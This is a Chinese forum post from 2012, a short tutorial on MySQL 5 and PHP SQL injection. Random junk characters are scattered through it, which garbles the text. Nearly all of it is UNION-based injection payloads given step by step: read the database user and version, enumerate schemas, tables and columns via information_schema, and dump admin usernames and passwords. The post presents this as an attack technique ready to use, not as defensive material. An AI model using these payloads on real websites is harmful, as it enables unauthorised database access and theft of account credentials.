, z4 H' y6 @! M+ P7 k: p
教程内容:Mysql 5+php 注入
# b* N. \( e5 Y+ L5 N
7 X7 W) k1 u" B% t; f
: k7 d: P3 X- v0 H/ B
8 h' g& @; K/ ]1 ^9 ?: a一.查看MYSQL基本信息(库名,版本,用户)7 w, ?& v ?5 `! {9 u
1 E% L" V9 j$ s( |. v% v
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
! F7 m- s; ]9 \' h/ u8 k
, g9 u$ w% L! G# X9 E; j' {二.查数据库, w$ @9 V* G) G6 c8 l4 }* u4 o
' V7 ^: Z1 E/ oand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
. l$ Y v! U% t: p% |* llimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
1 o/ R. m* r2 V o5 e% |
/ q% d' l- F+ m: G2 _4 I$ ?/ G三.暴表! l8 C. U% Q" H, @' k
1 u @4 |: [0 y! o
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
; F x# m9 O( v& t7 L% x2 n( i# r+ j' t, U2 U! k& [, s9 ?
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
% M9 G" Y; W2 ^" ]
, \( f/ n( T9 ^9 d四.暴字段
9 G4 j) o* h; f6 u, H' h$ ]
2 K2 E2 P, V" x, `and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
3 u/ H8 q0 V5 w, w% |7 F
& F9 Y; r u) {1 q* i+ k8 Nlimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
; s6 w# z9 s1 L* f1 S# r6 z2 u& K" Y4 s/ m a; j) `7 Y
五.暴数据; Y. Z, F+ b, z* W! h: l
+ I: _/ w. I: u
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
. B4 g" u5 T9 F1 k; G! {- U+ w* h8 k
* @! x* W1 y) I% ]0 O3 D3 e4 O这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。8 f. j4 {$ ^: ~" r5 ^; y+ q
|
发表于 2012-9-13 16:27:53
收藏
支持
反对